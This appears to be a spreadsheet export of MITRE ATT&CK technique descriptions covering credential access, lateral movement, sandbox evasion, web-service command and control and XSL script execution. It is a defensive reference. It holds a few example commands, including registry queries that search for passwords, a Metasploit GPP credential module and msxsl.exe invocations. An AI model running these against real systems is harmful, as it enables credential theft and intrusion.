Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. </t>
  </si>
  <si>
    <t>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)</t>
  </si>
  <si>
    <t>Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;
* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:&amp;#92;Users&amp;#92;(username)&amp;#92;.ssh&amp;#92;&lt;/code&gt; on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) 
In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.
When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. </t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
</t>
  </si>
  <si>
    <t>Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)
Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)
Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) </t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. 
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. </t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
